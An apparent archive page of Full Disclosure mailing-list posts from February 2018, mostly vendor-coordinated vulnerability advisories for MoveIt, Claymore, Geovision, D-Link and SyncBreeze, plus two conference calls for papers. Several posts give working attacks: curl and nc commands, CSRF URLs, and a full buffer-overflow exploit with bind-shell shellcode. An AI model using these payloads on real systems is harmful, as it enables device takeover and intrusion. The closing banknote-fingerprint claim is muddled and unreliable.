[FD] IPSwitch MoveIt Stored Cross Site Scripting (XSS)

2018-02-02 Thread 1n3 
# Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting (XSS)
# Date: 1-31-2017
# Software Link: https://www.ipswitch.com/moveit
# Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions
prior to 9.5 may also be vulnerable)
# Exploit Author: 1N3@CrowdShield - https://crowdshield.com (Early
Warning Security)
# Contact: https://twitter.com/crowdshield
# Vendor Homepage: https://www.ipswitch.com 
# Category: Webapps
# Attack Type: Remote
# Impact: Data/Cookie Theft 
 Description
==
IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting
(XSS) vulnerability. Attackers can leverage this vulnerability to send
malicious messages to other users in order to steal session cookies
and launch client-side attacks. 
 Proof of Concept
==
The vulnerability lies in the Send Message -> Body Text Area input
field.
POST /human.aspx?r=692492538 HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://host.com/human.aspx?r=510324925
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 598

czf=9c9e7b2a9c9e7b2a9c9e7b2a9c9e7b2a9c066e4aee81bf97f581826d8c093953d82d2b692be5490ece13e6b23f1ad09bda751db1444981eb029d2427175f9906&server=host.com&url=%2Fhuman.aspx&instid=2784&customwizlogoenabled=0&customwiznameup=&customwizzipnameup=%5Bdefault%5D&transaction=secmsgpost&csrftoken=1a9cc0f7aa7ee2d9e0059d6b01da48b69a14669d&curuser=kuxt36r50uhg0sXX&arg12=secmsgcompose&Arg02=&Arg03=452565093&Arg05=edit&Arg07=forward&Arg09=&Arg10=&opt06=&Opt08=&opt01=username&opt02=&opt03=&arg01=FW%3A+test&Opt12=1&arg04=&attachment=&opt07=1&arg05_Send=Send
 Solution
==
Update to version 9.5
 Disclosure Timeline
==
1/30/2017 - Disclosed details of vulnerability to IPSwitch.
1/31/2017 - IPSwitch confirmed the vulnerability and verified the fix
as of version 9.5 and approved public disclosure of the vulnerability.# Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting (XSS)
# Date: 1-31-2017
# Software Link: https://www.ipswitch.com/moveit
# Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions prior to 
9.5 may also be vulnerable)
# Exploit Author: 1N3@CrowdShield - https://crowdshield.com (Early Warning 
Security)
# Contact: https://twitter.com/crowdshield
# Vendor Homepage: https://www.ipswitch.com 
# Category: Webapps
# Attack Type: Remote
# Impact: Data/Cookie Theft 


1. Description
 
IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting (XSS) 
vulnerability. Attackers can leverage this vulnerability to send malicious 
messages to other users in order to steal session cookies and launch 
client-side attacks. 


2. Proof of Concept

The vulnerability lies in the Send Message -> Body Text Area input field.
 
POST /human.aspx?r=692492538 HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://host.com/human.aspx?r=510324925
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 598

czf=9c9e7b2a9c9e7b2a9c9e7b2a9c9e7b2a9c066e4aee81bf97f581826d8c093953d82d2b692be5490ece13e6b23f1ad09bda751db1444981eb029d2427175f9906&server=host.com&url=%2Fhuman.aspx&instid=2784&customwizlogoenabled=0&customwiznameup=&customwizzipnameup=%5Bdefault%5D&transaction=secmsgpost&csrftoken=1a9cc0f7aa7ee2d9e0059d6b01da48b69a14669d&curuser=kuxt36r50uhg0sXX&arg12=secmsgcompose&Arg02=&Arg03=452565093&Arg05=edit&Arg07=forward&Arg09=&Arg10=&opt06=&Opt08=&opt01=username&opt02=&opt03=&arg01=FW%3A+test&Opt12=1&arg04=&attachment=&opt07=1&arg05_Send=Send


3. Solution:

Update to version 9.5


4. Disclosure Timeline

1/30/2017 - Disclosed details of vulnerability to IPSwitch.
1/31/2017 - IPSwitch confirmed the vulnerability and verified the fix as of 
version 9.5 and approved public disclosure of the vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Recon Montreal 2018 Call For Papers - 0xE - Registration - Training - Conference - Submit! - PGP key

2018-02-02 Thread cfpmontreal2018 
- RECON MONTREAL 2018 -

0xE  - CFP - Training Registration - Conference - Submit! - PGP key
║││■■││║
╠┐└■└┐│■│■┤──╚╝──╔╗┌┬──┐  ■│├┤│╔╗│├┤│■  ┌──┬┐╔╗──╚╝──├■│■│┌┘■┘┌╣
╠■─╔═╗┘││■┤──■ ┌─╚╝├┘▄─┘┌──┤├┤├╣╠┤├┤├──┐└─▄└┤╚╝─┐ ■──├■││└╔═╗─■╣
■──║ ║─┘■─┤──█┌┘┌─┘││└─■  ▄─┘ ■┴┘└┘╚╝└┘└┴■ └─▄  ■─┘││└─┐└┐█──├─■└─║ ║──■
┌──╚═╝──┐■┘┌──┘┌┘ ┌┘└  ..  ┘└┐ └┐└──┐└■┌──╚═╝──┐
■┌■──╔╗ │ ┌┘■──┘┌─┘  ......  └─┐└──■└┐ │ ╔╗───┐■
╠││■■  ■│■┌─■ ■│ ││╣
║││└■  ■─┴■  https://recon.cx/2018/montreal  ││║
║│└──■   June 15 - 16 - 17, 2018 ││║
║└─■Montreal■┘│║
╚═╦═╦═╦═╦═╦╝
╔══╗
╚══╝
┌───┐┌──┐┌──┐┌──┐┐┌─┐   ┬ ┌──┐   ┌──┐ ╔╗
│ ■─┘├─  │   │  │├┘ │   │ └──┐   │  │ ║║
└   ┘└──┘└──┘└──┘└  ┘   ┘ └──┘   └─┘└ ╚═══╦═╦══╝
┌──┐┌──┐┐┌─┐─┐ ┌──┐┌  ┐┌─┬─┐┌──┐┌──┐ ╔╩══╗╔═╩══╗
│   │  │├┘ │ │ ├──┘│  │  │  ├─  │ ─┘ ║///║║║
└──┘└──┘└  ┘ └ ┘   └──┘  ┴  └──┘└  ┘ ╚═══╝╚══╦═╝
┌──┐┌──┐┌──┐┌  ┐┌──┐  ┬ ┌─┬─┐ ┐ ┌╔═══╩═╗
└──┐├─  │   │  ││ ─┘  │   │   └│┘║ ║
└──┘└──┘└──┘└──┘└  ┘  ┴   ┴┴ ╚╦╦═══╝
┌──┐┌──┐┐┌─┐┌──┐┌──┐┌──┐┌──┐┐┌─┐┌──┐┌──┐╔═╩═══╗╔═══╩═══╗
│   │  │├┘ │├─  ├─  │ ─┘├─  ├┘ ││   ├─  ║ ║║///║
└──┘└──┘└  ┘┘   └──┘└  ┘└──┘└  ┘└──┘└──┘╚══╦══╝╚═══╝
┌   ┐┬┌─┬─┐┬  ┬   ┌──┐ ╔═══╩═══╗
│ │ ││  │  ├──┤   │  │ ║   ║
└─┴─┘┴  ┴  ┴  ┴   └─┘└ ╚══╦╦═══╝
┌───┌──┐┌──┐┌  ┐┌──┐ ╔╩═╗╔═╩═══╗   ║
├─  │  ││   │  │└──┐ ║//║║ ║├───
┘   └──┘└──┘└──┘└──┘ ╚══╝╚╦╝   ║
┌──┐┐┌─┐   ╔══╩══╗ ║
│  │├┘ │   ║ ║├─
└──┘└  ┘   ╚═╦═══╦═══╝ ║
┌───┐┌──┐┐  ┌┌──┐┌──┐┌──┐┌──┐ ╔══╩═══╗╔══╩══╗  ║
│ ■─┘├─  └┐┌┘├─  │ ─┘└──┐├─   ║//║║ ║├──
└   ┘└──┘ └┘ └──┘└  ┘└──┘└──┘ ╚══╝╚══╦══╝  ║
┌──┐┐┌─┐┌──┐ ┬ ┐┌─┐┌──┐┌──┐┌──┐ ┬ ┐┌─┐┌──┐ ╔═╩═╗
├─  ├┘ ││ ─┐ │ ├┘ │├─  ├─ ││ ─┘ │ ├┘ ││ ─┐ ║   ║
└──┘└  ┘└──┘ ┴ └  ┘└──┘└──┘└  ┘ ┴ └  ┘└──┘ ╚══╦═╦══╝
┌──┐┐┌─┐   │ ╔╩══╗╔═╩══╗
│  │├┘ │┌──│ ║///║║║
└─┘└└  ┘└──┘ ╚═══╝╚╦═══╝
┌──┐   │┐  ┌┌──┐┐┌─┐┌──┐┌──┐   │ ╔═╩═══╗
│  │┌──│└┐┌┘│  │├┘ ││   ├─  ┌──│ ║ ║
└─┘└└──┘ └┘ └─┘└└  ┘└──┘└──┘└──┘ ╚═══╦══╦══╝
┌──┐ ┐ ┌─ ┌──┐│  ┌──┐ ┬┌─┬─┐┌──┐┌─┬─┐ ┬┌──┐┐┌─┐ ╔╩══╗╔══╩══╗
├─   └─┐  ├──┘│  │  │ │  │  │  │  │   ││  │├┘ │ ║   ║║/║
└──┘─┘ └  ┘   └─┘└──┘ ┴  ┴  └─┘└  ┴   ┴└──┘└  ┘ ╚═╦═╝╚═╝
┌─┬─┐┌──┐┌──┐ ┬  ┬ ┐┌─┐ ┬┌──┐┌  ┐┌──┐┌──┐ ╔═══╩╗
  │  ├─  │├──┤ ├┘ │ │└──┤│  │├─  └──┐ ║║
  ┴  └──┘└──┘ ┴  ┴ └  ┘ ┴   │└──┘└──┘└──┘ ╚═══╦╝
╔═╩╗
#   C F P  #
╚══╗
We are now inviting speakers to submit proposals   ║
for Recon Montreal 2018.   ║
   ║
Some guidelines for talks are: ║
   ║
 - 30 or 60 minute presentations   ║
   ║
 - We are open to proposals for workshops that would occur alongside   ║
   talks   ║
   ║
 - There will be time for five to ten minute informal lightning talks  ║
   during the REcon party  ║

[FD] Claymore Dual Gpu Miner <= 10.5 Format Strings Vulnerability

2018-02-02 Thread disclosure 


Claymore Dual Gpu Miner <= 10.5 Format Strings Vulnerability
===

product: Claymore's Dual Miner
 vulnerable version: <= 10.5
  fixed version: 10.6
 CVE number: - CVE-2018–6317
 impact: critical
   homepage: https://bitcointalk.org/index.php?topic=1433925.0
  found: 2018-01-26
 by: twitter.com/res1n

===


Vulnerability overview/description:
---
Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format 
strings vulnerability. This allows an unauthenticated remote attacker to 
read memory addresses, or immediately terminate the mining process 
causing a denial of service.


1) By sending a custom request to the json api on port  of the 
remote management service it's possible to leak stack addresses and 
possibly rewrite stack addresses with %p.  I wasn't able to break out of 
the json padding but someone else may be able to as %s also dumps string 
contents.


example - echo -e '{"id":1,"jsonrpc":"1.0","method":"%x %x %x %x"}' | nc 
192.168.1.139  & printf "\n".


2) Sending %n to the json api on port  immediately kills the mining 
process.


example - echo -e '{"id":1,"jsonrpc":"1.0","method":"%n"}' | nc 
192.168.1.139  & printf "\n".


Solution

Upgrade to version 10.6


Vendor contact timeline:

01/26/18 — Reported to dev
01/26/18 — Confirmed and immediately patched. 10.6 released request for 
3–4 day embargo

01/31/18 — Public Disclosure

Writeup - 
https://medium.com/secjuice/claymore-dual-gpu-miner-10-5-format-strings-vulnerability-916ab3d2db30


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CFP: EuroSec 2018, 11th European Workshop on Systems Security (Extended Deadline: February 9, 2018)

2018-02-02 Thread Fengwei Zhang 
# Call for Papers: EuroSec 2018

11th European Workshop on Systems Security
Porto, Portugal - April 23, 2018

 - Web: http://www.sharcs-project.eu/eurosec-2018/
 - Twitter: @EuroSecWorkshop
 - Hashtag: #eurosec2018

## Important Dates

 - Extended paper submission deadline: *February 9, 2018 (AoE)*
 - Acceptance notification: March 2, 2018
 - Final paper due: March 8, 2018
 - Workshop: April 23, 2018

## About EuroSec

The 11th European Workshop on Systems Security (EuroSec) aims to bring
together researchers, practitioners, system administrators, system
programmers, and others interested in the latest advances in the
security of computer systems and networks. The objective of the
workshop is to discuss novel, practical, systems-oriented work. The
workshop will precede the EuroSys 2018 conference.

## Our Aim

EuroSec encourages systems security researchers to share early
iterations of bleeding-edge ideas with the community, before they are
further developed into full papers. Reciprocally, authors receive
feedback to help steer and improve their research to its full
potential. Many EuroSec papers later form the basis for full
conference papers presented at one of the top venues in computer
security.

## Topics of Interest

EuroSec seeks contributions on all aspects of systems security. Topics
of interest include (but are not limited to):

 - New attacks, evasion techniques, and defenses
 - Operating system security
 - Mobile systems security
 - Malicious code analysis and detection
 - Web security
 - Network security
 - Reverse engineering and binary analysis
 - Hardware security
 - Virtual machines and hypervisors
 - Trusted computing and its applications
 - System security aspects of privacy
 - Identity management and anonymity
 - Systems-based forensics
 - Vulnerability discovery, analysis, and exploitation
 - Embedded system security
 - Cybercrime ecosystem and economics
 - Security of critical infrastructures

In accordance with the spirit of EuroSys, we also seek:

 - Quantified or insightful experience with existing systems
 - Reproduction or refutation of previous results
 - Negative results and early ideas

## Paper Submissions

You are invited to submit papers of up to 6 pages, with 9-point font,
in a two-column format, including figures, tables and references.
Submitted papers must use the ACM sig-alternate-05-2015 LaTeX
template. You should not modify key aspects of the template, such as
font face, spacing, etc. The template, as well as instructions on how
to use it, can be found here.

All submissions will be reviewed by the Program Committee. Only
original, novel work will be considered for publication. Accepted
papers will be published in the Proceedings of EuroSec in the ACM
Digital Library.

Submissions should be made online at

 - http://eurosec2018.sec.cs.tu-bs.de

## Committee

### Program Chairs

 - Angelos Stavrou, George Mason University
 - Konrad Rieck, TU Braunschweig

### Program Committee

 - Magnus Almgren, Chalmers University of Technology
 - Manos Antonakakis, Georgia Institute of Technology
 - Elias Athanasopoulos, University of Cyprus
 - Foteini Baldmitsi, George Mason University
 - Leyla Bilge, Symantec Research Labs
 - Lorenzo Cavallaro, Royal Holloway, University of London
 - Brendan Dolan-Gavitt, New York University
 - Yanick Fratantonio, Eurecom
 - Alexandros Kapravelos, NC State University
 - Vasileios Kemerlis, Brown University
 - Anil Kurmus, IBM Research - Zurich
 - Andrea Lanzi, University of Milan
 - Martina Lindorfer, UC Santa Barbara
 - Federico Maggi, Trend Micro
 - Collin Mulliner, 3BLabs
 - Mathias Payer, Purdue University
 - Jason Pollakis, University of Illinois at Chicago
 - Christian Rossow, Saarland University
 - Gianluca Stringhini, University College London
 - Giorgos Vasiliadis, FORTH
 - Fengwei Zhang, Wayne State University

### Steering Committee

 - Herbert Bos, VU Amsterdam
 - Evangelos Markatos, FORTH and University of Crete
 - Sotiris Ioannidis, FORTH

### Publicity Chairs

 - Fengwei Zhang, Wayne State University
 - Christian Wressnegger, TU Braunschweig

### Web Chair

 - Antonis Krithinakis, FORTH

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access

2018-02-02 Thread bashis 
[STX]

Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command 
Execution - Multiple Stack Overflow - Double free - Unauthorized Access

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis  (November 2017)
PoC: https://github.com/mcw0/PoC
Python PoC: https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
Release date: February 1, 2018
Full Disclosure: 90 days

Vendor URL: http://www.geovision.com.tw/
Updated FW: http://www.geovision.com.tw/download/product/

heap: Executable + Non-ASLR
stack: Executable + ASLR

Vulnerable:
Practically more or less all models and versions with FW before 
November/December 2017 of Geovision embedded IP devices suffer from one or more 
of these vulnerabilities.

Verified:
GV-BX1500 v3.10 2016-12-02
GV-MFD1501 v3.12 2017-06-19

Timeline:
November 5, 2017: Initiated contact with Geovision
November 6, 2017: Response from Geovision
November 8, 2017: Informed Geovision about quite dangerous bug in 
'FilterSetting.cgi'
November 8, 2017: Responce from Geovision
November 15, 2017: Reached out to Geovision to offer more time until FD
   (due to the easy exploiting and number of vulnerabilities in 
large number of products)
November 17, 2017: Request from Geovision to have time to end of January 2018
November 18, 2017: Agreed to FD date of February 1, 2018
November 20, 2017: Received one image for test purposes
November 26, 2017: ACK to Geovision that image looks good
January 16, 2018: Sent this FD and PoC Python to Geovision for comments before 
FD, if any objections.
January 17, 2018: Received all OK from Geovision, no objections, toghether with 
thanks for the effort for trying to make Geovision products more safe.
January 17, 2018: Thanked Geoviosion for good cooperation.
February 1, 2018: Full disclosure


-[Unathorized Access]-

1)
PoC: Reset and change 'admin' to 'root' with passwd 'PWN' (GV-MFD1501 v3.12 
2017-06-19)
curl -v 
http://192.168.57.20:80/UserCreat.cgi?admin_username=root\&admin_passwordNew=PWN

2)
PoC: Change device WebGUI language back to default
curl -v -X POST http://192.168.57.20:80/LangSetting.cgi -d 
lang_type=0\&submit=Apply

3)
Unathorized upgrade of firmware.
PoC: Reboot the remote device as in 'run_upgrade_prepare'
curl -v "http://192.168.57.20:80/geo-cgi/sdk_fw_update.cgi";
URI: http://192.168.57.20/ssi.cgi/FirmwareUpdate.htm

4)
PoC: Upload of Firmware header for checking correct firmware.
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_fw_check.cgi"; -d 
"BLABAgAAADKvfBIBGDIpBwBhc19jcmZpZAAALgYAALDXe///AABib290bG9hZGVyLmJpbgA0ALAAAgBOAP//AAB1SW1hZ2UA1OIaALAANgDSw///AAByYW1kaXNrLmd6ALBtArAAUgAIuf//AAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjozMDUNCkhJRDoxMTc2LE5hbWU6R1YtQlgzNDAwRSxEb3duVmVyOjMwMw0KSElEOjExNzUsTmFtZTpHVi1CWDE1MDBFLERvd25WZXI6MzAzDQpISUQ6MTEwMSxOYW1lOkdWLVVORkUyNTAzLERvd25WZXI6MzA2DQpISUQ6MTE0NSxOYW1lOkdWLVVOMjYwMCxEb3c="

/var/log/messages
192.168.57.1 - - [01/Jan/1970:00:32:43 +] "PUT /geo-cgi/sdk_fw_check.cgi 
HTTP/1.1" 200 25000 "" "curl/7.38.0"
Nov  5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802 to run 
'geo-cgi/sdk_fw_check.cgi', query[]
Nov  5 17:11:51 sdk_fw_check.cgi: CONTENT_LENGTH = 684
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) main[183]: base64 encode length : 684
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) main[184]: base64 encode output : 
BLABAgAAADKvfBIBGDIpBwBhc19jcmZpZAAALgYAALDXe///AABib290bG9hZGVyLmJpbgA0ALAAAgBOAP//AAB1SW1hZ2UA1OIaALAANgDSw///AAByYW1kaXNrLmd6ALBtArAAUgAIuf//AAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjoz
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) main[185]: decode length: 512
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) main[186]: decode output: ^D
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) check_image_format_is_OK[839]: (1) 
Product Error: Image's magic[513] != DEV_MAGIC[1000]
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) check_firmware[135]: ERROR : check 
firmware, length [512]

5)
Unathorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET) 
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi";

6)
/PSIA/
Access to GET (read) and PUT (write)
curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
curl -v -X PUT http://192.168.57.20:80/PSIA/System/updateFirmware
curl -v -X PUT http://192.168.57.20:80/PSIA/System/factoryReset
[...]
List: /PSIA/System/reboot/index
Usage: /PSIA/S

[FD] New vulnerabilities in D-Link DIR-100

2018-02-02 Thread MustLive 

Hello list!

There are Cross-Site Request Forgery and URL Redirector Abuse
vulnerabilities in D-Link DIR-100. This is my second advisory for DIR-100.

-
Affected products:
-

Vulnerable is the next model: D-Link DIR-100, Firmware v1.01. All other
versions also must be vulnerable.

--
Details:
--

Cross-Site Request Forgery (WASC-09):

Change admin's password:

http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin

Turn on Remote Management:

http://site/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80

CSRF attack to change admin's password and turn on Remote Management:

http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin&SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80

URL Redirector Abuse (WASC-38):

http://site/Tools/vs.htm?location=http://www.google.com

This is Persisted Redirector attack. After setting of an address in location
parameter it saves and later on it's possible to redirect only by visiting
of the page http://site/Tools/vs.htm.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/8021/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Flexense SyncBreeze Entreprise 10.3.14 Buffer Overflow (SEH-bypass)

2018-02-02 Thread RYT 
Hi List,

Description:

A buffer overflow vulnerability in "Add command" functionality exists in 
Flexense’s SyncBreeze Enterprise <= 10.3.14. The vulnerability can be triggered 
by an authenticated attacker who submits more than 5000 characters as the 
command name. It will cause termination of the SyncBreeze Enterprise server and 
possibly remote command execution with SYSTEM privilege.

Author:

@ryantzj

www.ryantzj.com

Homepage:

http://http://www.syncbreeze.com/

CVE-ID:

CVE-2017-17996 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17996

CVSSv3 Score:

9.9

CVSSv3 Vector

(/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

Proof of Concept

#!/usr/bin/python

import socket


buffsize = 5000

#msfvenom -p windows/shell_bind_tcp LPORT=443 EXITFUNC=seh --bad-chars 
'\x0d\x0a\x00\x27\x22\x08\x09\x1b\x5c\x5f\x25\x26\x3d\x2b'  -f python -v 
shellcode
shellcode =  ""
shellcode += "\x33\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
shellcode += "\x81\x76\x0e\x93\xfe\x85\x99\x83\xee\xfc\xe2\xf4"
shellcode += "\x6f\x16\x07\x99\x93\xfe\xe5\x10\x76\xcf\x45\xfd"
shellcode += "\x18\xae\xb5\x12\xc1\xf2\x0e\xcb\x87\x75\xf7\xb1"
shellcode += "\x9c\x49\xcf\xbf\xa2\x01\x29\xa5\xf2\x82\x87\xb5"
shellcode += "\xb3\x3f\x4a\x94\x92\x39\x67\x6b\xc1\xa9\x0e\xcb"
shellcode += "\x83\x75\xcf\xa5\x18\xb2\x94\xe1\x70\xb6\x84\x48"
shellcode += "\xc2\x75\xdc\xb9\x92\x2d\x0e\xd0\x8b\x1d\xbf\xd0"
shellcode += "\x18\xca\x0e\x98\x45\xcf\x7a\x35\x52\x31\x88\x98"
shellcode += "\x54\xc6\x65\xec\x65\xfd\xf8\x61\xa8\x83\xa1\xec"
shellcode += "\x77\xa6\x0e\xc1\xb7\xff\x56\xff\x18\xf2\xce\x12"
shellcode += "\xcb\xe2\x84\x4a\x18\xfa\x0e\x98\x43\x77\xc1\xbd"
shellcode += "\xb7\xa5\xde\xf8\xca\xa4\xd4\x66\x73\xa1\xda\xc3"
shellcode += "\x18\xec\x6e\x14\xce\x96\xb6\xab\x93\xfe\xed\xee"
shellcode += "\xe0\xcc\xda\xcd\xfb\xb2\xf2\xbf\x94\x01\x50\x21"
shellcode += "\x03\xff\x85\x99\xba\x3a\xd1\xc9\xfb\xd7\x05\xf2"
shellcode += "\x93\x01\x50\xf3\x9b\xa7\xd5\x7b\x6e\xbe\xd5\xd9"
shellcode += "\xc3\x96\x6f\x96\x4c\x1e\x7a\x4c\x04\x96\x87\x99"
shellcode += "\x92\x45\x0c\x7f\xf9\xee\xd3\xce\xfb\x3c\x5e\xae"
shellcode += "\xf4\x01\x50\xce\xfb\x49\x6c\xa1\x6c\x01\x50\xce"
shellcode += "\xfb\x8a\x69\xa2\x72\x01\x50\xce\x04\x96\xf0\xf7"
shellcode += "\xde\x9f\x7a\x4c\xfb\x9d\xe8\xfd\x93\x77\x66\xce"
shellcode += "\xc4\xa9\xb4\x6f\xf9\xec\xdc\xcf\x71\x03\xe3\x5e"
shellcode += "\xd7\xda\xb9\x98\x92\x73\xc1\xbd\x83\x38\x85\xdd"
shellcode += "\xc7\xae\xd3\xcf\xc5\xb8\xd3\xd7\xc5\xa8\xd6\xcf"
shellcode += "\xfb\x87\x49\xa6\x15\x01\x50\x10\x73\xb0\xd3\xdf"
shellcode += "\x6c\xce\xed\x91\x14\xe3\xe5\x66\x46\x45\x7b\x97"
shellcode += "\xa1\x14\xed\x3f\x06\x43\x18\x66\x46\xc2\x83\xe5"
shellcode += "\x99\x7e\x7e\x79\xe6\xfb\x3e\xde\x80\x8c\xea\xf3"
shellcode += "\x93\xad\x7a\x4c"


jmp2 = "\xE9\x42\xFE\xFF\xFF"


payload = “A”*(432-len(shellcode)-20) #eip offset at 436
payload += "\x90"*12
payload += shellcode
payload += "\x90"*8
payload += "\x71\x06\x70\x04" #NSEH, a jump net
payload += "\xB1\x41\x01\x10" #SEH
payload += "\x90"
payload += jmp2 #jmp back to shellcode
payload +=“C”*(buffsize) #ends at 83 bytes

buffer ="POST /add_command?sid=c5ecca3e01e7d15b0a490fc197f14395 HTTP/1.1\r\n"
buffer +="Host: 192.168.38.154\r\n"
buffer +="Content-Type: application/x-www-form-urlencoded\r\n"
buffer +="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
buffer +=“Content-Length: ”+str(len(payload)+13)+"\r\n\r\n"
buffer +=“command_name=”+payload

print “[*] Sending evil HTTP request to syncbrz”
print “[*] exploited by @ryantzj”
print “[*] Please modify session id and target host to get exploit working”

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((“192.168.38.154”,80))
expl.send(buffer)
print expl.recv(1024)
expl.close


Disclosure Timeline

December 29, 2017 1: Vulnerability acquired by ryantzj

December 30, 2017 2: Informed vendor via supp...@syncbreeze.com

January 31, 2018 3: Exploit published


Regards,

ryantzj

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Banknotes Misproduction security & biometric weakness

2018-02-02 Thread Ben Tasker 
There's some detail in the Vulnerability magazine link, reproducing here so
there's a record

We discovered an anomaly in the hologram section of the new printed 20€ &
50€ banknotes. The security sign on the banknotes are produced with a
transparent film. In the middle of the new hologram of the 20 & 50€
banknotes is a picture of a women and different fingerprint-like
structures. At the moment we noted the problem, we used a microscope to
look closer.

After an internal discussion, that the security sign could maybe used for
biometrics authentication processes, we tested the hologram for usage on
different fingerprinter-scanners like asus pro laptop, eikon, samsung
galaxy S7/8 and the apple iphone v11. All mechanisms could be bypassed
using the hologram of the banknotes to fake a fingerprint which is accepted
by the fingerprint-scanner system. After that, the attacker is able to
relogin with the universal hologram.

Finally, we were able to bypass the the biometric identification process of
the different devices. No system is able to identify, that the hologram is
not a real fingerprint. At the end, we figured out in the testing process
that the holograms can be used to add via write and auth via read. There
are now muliple problems in connection to the security issue.
1. Fingerprint - Reader & Writer (Mobile Devices)

The end user devices like phones with fingerprinter sensors of
manufacturers like samsung, apple, huawei & co are permanently vulnerable
to this new type of attack. The sensor does not approve the reflection of
the hologram in the read and write mode. It interprets the security signs
as features of a real fingerprint. Thus results in an easy bypass using any
20€ or 50€ banknotes after registration. To use an attacker only requires
to use his finger behind the hologram to bypass the fingerpulse check of
the idevice. All other mechanism are not accurate approving the content
during the sensor check.

2. Biometric Security in Europe
Each time the EZB produces more of the affected banknotes, the biometric
security in all over europe countries is generally weakened. In the near
future the EZB plans to inetrgate the holograms to any banknote (5€, 10€,
100€ & Co.). This would be a crazy incident for all biometric systems using
a fingertip to authenticate because of any person is by now able to perform
those typ of attacks against an environment or service.

3. Fake fingerprints to go
Any person that has access to a system could use a hologram of a european
banknote to fake his fingerprint. Even the once which do not have the
expertise to fake it because in case of a publication, the government would
have to reckon with it.

4. Universal fingerprint as key
One time a hologram is written to a database, any attacker could use
another hologram of the same banknote series to bypass the security
mechanism to finally get access to the environment. Also administrators or
moderators are able to setup a universal fingerprint key to any dbms for
further entrance.

5. Save content in biometric signs or read data
The problematic could be used by security agencies to save data in the
biometric sign or to use them to get access to protected environments. An
agent could for example save data variables in the biometric sign of the
banknote to exfiltrate information.

6. Information in the hologram
In the special case of a fingerprint entry is generated by mathematical
variables with plain information, the content can be saved as plain-text
information to extract the binary information. The binary information of
the hologram fingerprint can then be decyphered by using different unknown
one-time pad keys. So the data of the fingerprint is translated to binary
code with a fingerprint device (open source) in plain-text. The plain-text
is then used to identify chiffre inside the security sign hologram.
7. Save your Privacy

